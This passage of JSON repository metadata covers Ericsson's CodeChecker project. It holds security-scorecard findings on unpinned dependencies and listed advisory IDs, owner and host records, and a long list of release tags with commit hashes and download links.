docker/Dockerfile.test.sqlite.clang11.bionic:3-29","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: pipCommand not pinned by hash: docker/Dockerfile.test.sqlite.clang11.xenial:3-33","Warn: downloadThenRun not pinned by hash: web/docker/Dockerfile:16-23","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: web/docker/Dockerfile:91-119","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_master_analysis.yml:24","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:22","Warn: pipCommand not pinned by hash: .github/workflows/codechecker_pr_analysis.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:103","Warn: pipCommand not pinned by hash: .github/workflows/pypi.yml:104","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:26","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:51","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:58","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:64","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:70","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:77","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:83","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:125","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:177","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:217","Info:   0 out of  28 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   6 third-party GitHubAction dependencies pinned","Info:   0 out of   5 containerImage dependencies pinned","Info:   0 out of  24 pipCommand dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":0,"reason":"24 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: PYSEC-2025-49 / GHSA-5rjg-fvgr-3xxf","Warn: Project is vulnerable to: GHSA-9hjg-9r4m-mvj7","Warn: Project is vulnerable to: GHSA-3ww4-gg4f-jr7f","Warn: Project is vulnerable to: PYSEC-2024-225 / GHSA-6vqw-3v5j-54x4","Warn: Project is vulnerable to: GHSA-9v9h-cgj8-h64p","Warn: Project is vulnerable to: GHSA-h4gh-qq45-vh27","Warn: Project is vulnerable to: PYSEC-2023-254 / GHSA-jfhm-5ghh-2f97","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-gxpj-cx7g-858c","Warn: Project is vulnerable to: GHSA-2j2x-2gpw-g8fm","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-2p57-rm9w-gvfp","Warn: Project is vulnerable to: GHSA-f8q6-p94x-37v3","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-7fh5-64p2-3v2j","Warn: Project is vulnerable to: GHSA-p8p7-x288-28g6","Warn: Project is vulnerable to: GHSA-f5x3-32g6-xq36","Warn: Project is vulnerable to: GHSA-72xf-g2v4-qvf3","Warn: Project is vulnerable to: GHSA-cchq-frgv-rjh5","Warn: Project is vulnerable to: GHSA-g644-9gfx-q4q4","Warn: Project is vulnerable to: GHSA-5j4c-8p2g-v4jx","Warn: Project is vulnerable to: GHSA-g3ch-rx76-35fx","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-14T22:53:38.249Z","repository_id":37431651,"created_at":"2025-08-14T22:53:38.249Z","updated_at":"2025-08-14T22:53:38.249Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":271198843,"owners_count":24717130,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-08-19T02:00:09.176Z","response_time":63,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"Ericsson","name":"Ericsson","uuid":"4161311","kind":"organization","description":"Home for Ericsson's Open Source software","email":"opensource@ericsson.com","website":"http://www.ericsson.com","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/4161311?v=4","repositories_count":119,"last_synced_at":"2024-04-15T22:07:40.334Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/Ericsson","funding_links":[],"total_stars":4306,"followers":165,"following":0,"created_at":"2022-11-05T10:49:44.232Z","updated_at":"2024-04-15T22:07:56.651Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ericsson/repositories"},"tags":[{"name":"v6.26.1","sha":"b7810134193a48f9ec33da861b1e308f7ed553b8","kind":"commit","published_at":"2025-07-10T17:42:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.1/manifests"},{"name":"v6.26.0","sha":"0bbf351e870c7056cd9cc0dc44a795c0fe805dfa","kind":"commit","published_at":"2025-06-06T23:31:28.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0/manifests"},{"name":"v6.26.0-rc1","sha":"e0b9374245f88450d5b6dc4b164f78d9e2f06cfb","kind":"commit","published_at":"2025-04-28T09:21:09.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.26.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.26.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.26.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.26.0-rc1/manifests"},{"name":"v6.25.1","sha":"c63dcdd8aa8dbd47360a0a02234c94e45107fb76","kind":"commit","published_at":"2025-03-12T13:44:01.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.1/manifests"},{"name":"v6.25.0","sha":"d1ca304f33f4852275a612c05fc9fa102e34dcaa","kind":"commit","published_at":"2025-03-05T08:55:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0/manifests"},{"name":"v6.24.7","sha":"71f343577e0eea089e53b3bd78dfcb8867403cf3","kind":"commit","published_at":"2025-02-18T10:30:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.7","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.7/manifests"},{"name":"v6.24.6","sha":"4ce6544bb734faa69fc00023b1477f416541933a","kind":"commit","published_at":"2025-02-17T15:00:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.6","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.6/manifests"},{"name":"v6.24.5","sha":"5914f3a98336823c3a0a1061d84832ed88822469","kind":"commit","published_at":"2025-01-21T14:55:23.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.5/manifests"},{"name":"v6.25.0-rc1","sha":"920d71089ac661d07670c8b9d5c2dd2cebcafcbd","kind":"commit","published_at":"2024-12-11T08:48:22.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.25.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.25.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.25.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.25.0-rc1/manifests"},{"name":"v6.24.4","sha":"454d978191ed42c8202a2244dc092dfb6fd8c83a","kind":"commit","published_at":"2024-10-25T10:41:35.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.4/manifests"},{"name":"v6.24.3","sha":"42074b5e3e3e8c166364b6a618b3795de60c6bbf","kind":"commit","published_at":"2024-10-18T13:35:10.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.3/manifests"},{"name":"v6.24.2","sha":"ad41702e3108e4b92ae5d0143a5b961cc34195eb","kind":"commit","published_at":"2024-10-18T10:18:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.2/manifests"},{"name":"v6.24.1","sha":"2cc6285dfd32b786e92239d4038dcdea3abfb63b","kind":"commit","published_at":"2024-09-13T09:33:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.1/manifests"},{"name":"v6.24.0","sha":"ea795071d62637c69300f4528b6c46c75b2274bc","kind":"commit","published_at":"2024-06-12T12:29:40.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0/manifests"},{"name":"v6.24.0-rc1","sha":"f05a9bf97759b133f0729aaf12232c54b46b7c19","kind":"commit","published_at":"2024-04-18T06:33:26.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.24.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.24.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.24.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.24.0-rc1/manifests"},{"name":"v6.23.1","sha":"2a8fa6e711a4ff591280a79fe8798dee2507d984","kind":"commit","published_at":"2023-12-14T14:30:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.1/manifests"},{"name":"v6.23.0","sha":"bea15d4fb77478860dee41f6e7f206050720869a","kind":"commit","published_at":"2023-12-08T18:46:51.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0/manifests"},{"name":"v6.23.0-rc2","sha":"605ba1b9db6ed067c89a12f7055cc177b76f8ed6","kind":"commit","published_at":"2023-11-17T11:24:41.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc2/manifests"},{"name":"v6.23.0-rc1","sha":"848e335ff33e49db1905331424c268d423feb7fc","kind":"commit","published_at":"2023-10-30T14:42:00.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.23.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.23.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.23.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.23.0-rc1/manifests"},{"name":"v6.22.2","sha":"a3d35cfd509b995187288cd8631446415a334257","kind":"commit","published_at":"2023-07-13T14:47:54.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.2/manifests"},{"name":"v6.22.1","sha":"8aabb4f715ed971f5ff9751b438e2ac00016e145","kind":"commit","published_at":"2023-04-19T13:23:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.1/manifests"},{"name":"v6.22.0","sha":"ecf377637b86360c75508952b2e43fabac2aec6b","kind":"commit","published_at":"2023-04-14T13:22:21.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0/manifests"},{"name":"v6.22.0-rc1","sha":"6fc70f69b75ccbe46f537cc817b0cf07ba9c8cd9","kind":"commit","published_at":"2023-03-24T14:34:32.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.22.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.22.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.22.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.22.0-rc1/manifests"},{"name":"v6.21.0","sha":"fe0ac5b291ed3cfef8fd8c6909501de55dabc20e","kind":"commit","published_at":"2022-11-09T17:22:05.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0/manifests"},{"name":"v6.20.0-hotfix5","sha":"e70c682f11af655d6b174a15d596ed913f1cb924","kind":"commit","published_at":"2022-11-04T13:36:14.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix5","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix5/manifests"},{"name":"v6.20.0-hotfix4","sha":"cbefae31ba2a4b66944af401da05e85b858a290a","kind":"commit","published_at":"2022-11-03T17:44:49.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix4","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix4/manifests"},{"name":"v6.21.0-rc1","sha":"b629fb04a7f05dbbc74aff0616add06ef9b26dd1","kind":"commit","published_at":"2022-10-27T09:41:02.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.21.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.21.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.21.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.21.0-rc1/manifests"},{"name":"v6.20.0-hotfix3","sha":"49a50a849df44881e7709cb26f7daa2380139359","kind":"commit","published_at":"2022-09-26T17:11:33.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix3","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix3/manifests"},{"name":"v6.20.0-hotfix2","sha":"b518f9af122c36fc9896a2f1fafe417395e2e82e","kind":"commit","published_at":"2022-09-21T18:46:30.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix2/manifests"},{"name":"v6.20.0-hotfix1","sha":"0297574b742ab8186665c3a5d2917fa89245b59f","kind":"commit","published_at":"2022-09-19T17:24:52.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-hotfix1/manifests"},{"name":"v6.20.0","sha":"7d65d89c2a3fed84f395016d4c9815bab860d0b3","kind":"commit","published_at":"2022-09-15T11:44:34.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0/manifests"},{"name":"v6.20.0-rc1","sha":"d24c22cd39a9e7a9145c5293843c6450e31862db","kind":"commit","published_at":"2022-08-22T21:27:06.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.20.0-rc1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.20.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.20.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.20.0-rc1/manifests"},{"name":"v6.19.1-hotfix2","sha":"c0af8d9a42f75f28ccfdc149194e5cc95be14841","kind":"commit","published_at":"2022-07-21T15:16:12.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix2","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix2/manifests"},{"name":"v6.19.1-hotfix1","sha":"d564db65a58fc7ef651ab1474a72eadf4c29c55f","kind":"commit","published_at":"2022-07-06T13:28:50.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1-hotfix1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1-hotfix1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1-hotfix1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1-hotfix1/manifests"},{"name":"v6.19.1","sha":"9fa0f9817f6e91eda2a9202e0a3bf5006accdc8c","kind":"commit","published_at":"2022-03-18T15:09:57.000Z","download_url":"https://codeload.github.com/Ericsson/codechecker/tar.gz/v6.19.1","html_url":"https://github.com/Ericsson/codechecker/releases/tag/v6.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/Ericsson/codechecker@v6.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ericsson%2Fcodechecker/tags/v6.19.1","manifests_url":"https://repos.